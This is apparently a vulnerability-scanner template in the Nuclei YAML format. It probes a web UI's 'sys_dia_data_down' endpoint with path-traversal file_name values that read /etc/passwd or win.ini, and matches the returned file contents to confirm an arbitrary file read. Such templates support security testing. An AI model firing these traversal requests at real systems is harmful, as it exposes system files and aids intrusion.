id: webui-js-oem-file-read

info:
  name: webui-js-oem-file-read
  author: SleepingBag945
  severity: high

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "for 16-bit app support"
          - "root:.*:0:0:"
        part: body
        condition: or

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/plain"
        part: header